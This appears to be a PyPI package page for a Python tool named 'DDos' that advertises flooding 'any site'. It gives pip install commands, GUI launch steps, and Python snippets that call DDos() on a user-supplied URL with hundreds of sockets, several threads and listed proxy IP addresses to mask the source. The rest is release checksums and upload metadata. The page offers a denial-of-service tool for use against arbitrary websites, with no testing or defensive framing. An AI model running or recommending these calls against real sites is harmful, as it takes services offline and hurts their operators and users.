DDos
DDos any site using python
Install
From Pypi
pip3 install DDos==1.0.1 (You should really use this version)
From GitHub
pip3 install git+https://github.com/donno2048/DDos
Usage
GUI
To use it just run:
DDos
or
ddos
in the terminal to launch the GUI (tkinter is a requirement for the GUI so use: sudo apt-get update && sudo apt-get install python3-tk -y on linux and on Windows it's already installed)
TUI
To use the text-based user interface see this python example:
from DDos import checkUrl, DDos # import the needed functions
while True:
url = input("Give me a URL: ") # get a url from the user
if checkUrl(url): break # if it's formatted correctly exit the loop
else: print("This URL isn't formatted correctly, try again") # else, go back
DDos(url, sockets = 400, threads = 10, use_proxies = True) # ddos this url with 400 sockets and 10 threads and use the built-it proxies
or simply:
from DDos import DDos
DDos(input("Give me a URL: ")) # if the url isn't formatted correctly it will have an assertion error, use 500 sockets and 10 threads, no proxies will be used
The DDos function has also a custom_proxies optional variable and there is a checkProxy function, you can use them like so:
from DDos import DDos, checkProxy
assert checkProxy("109.237.91.155:8080")
assert checkProxy("178.128.37.176:80")
DDos(input("Give me a URL: "), use_proxies = True, custom_proxies = ["109.237.91.155:8080", "178.128.37.176:80"])
If you give an invalid proxy you will get an assertion error.
Release files for DDos 1.0.3
For a detailed explanation of source distributions (sdists) and built distributions (wheels), please see the package formats documentation.
Source distribution (sdist)
| File | Size | Uploaded | |
|---|---|---|---|
| DDos-1.0.3.tar.gz | 6.6 kB | Details |
Built distribution (wheel)
| File | Interpreter | ABI | Platform | Reset |
|---|---|---|---|---|
| DDos-1.0.3-py3-none-any.whl | Python 3 | none | any | Details |
Total release size: 13.7 kB
Release files / DDos-1.0.3.tar.gz
| Download URL | DDos-1.0.3.tar.gz |
|---|---|
| Size | 6.6 kB |
| Tags | Source |
|
SHA-256 checksum How to use checksums |
5de17547f66f5b7e658af17e81f61e98251e55748ce829911df58744664473eb
|
|
BLAKE2b-256 checksum How to use checksums |
4d14ee513d14b69bc649a59353bf2bf3940628d749920f4f22cd6757135d1548
|
| Upload date | |
|
Uploaded using Trusted Publishing? What is trusted publishing? |
No |
| Uploaded via |
twine/3.7.1 importlib_metadata/4.10.0 pkginfo/1.8.2 requests/2.26.0 requests-toolbelt/0.9.1 tqdm/4.62.3 CPython/3.10.1
|
Release files / DDos-1.0.3-py3-none-any.whl
| Download URL | DDos-1.0.3-py3-none-any.whl |
|---|---|
| Size | 7.1 kB |
| Tags | Python 3 |
|
SHA-256 checksum How to use checksums |
4c6f330b08df12a256723466cb1d188ea5b231dd5174afe83fab45aa3c10d2f7
|
|
BLAKE2b-256 checksum How to use checksums |
e28cb579326d78e2fe01f87789ba82e174fadfb1ac16377743d7afaa31d21dec
|
| Upload date | |
|
Uploaded using Trusted Publishing? What is trusted publishing? |
No |
| Uploaded via |
twine/3.7.1 importlib_metadata/4.10.0 pkginfo/1.8.2 requests/2.26.0 requests-toolbelt/0.9.1 tqdm/4.62.3 CPython/3.10.1
|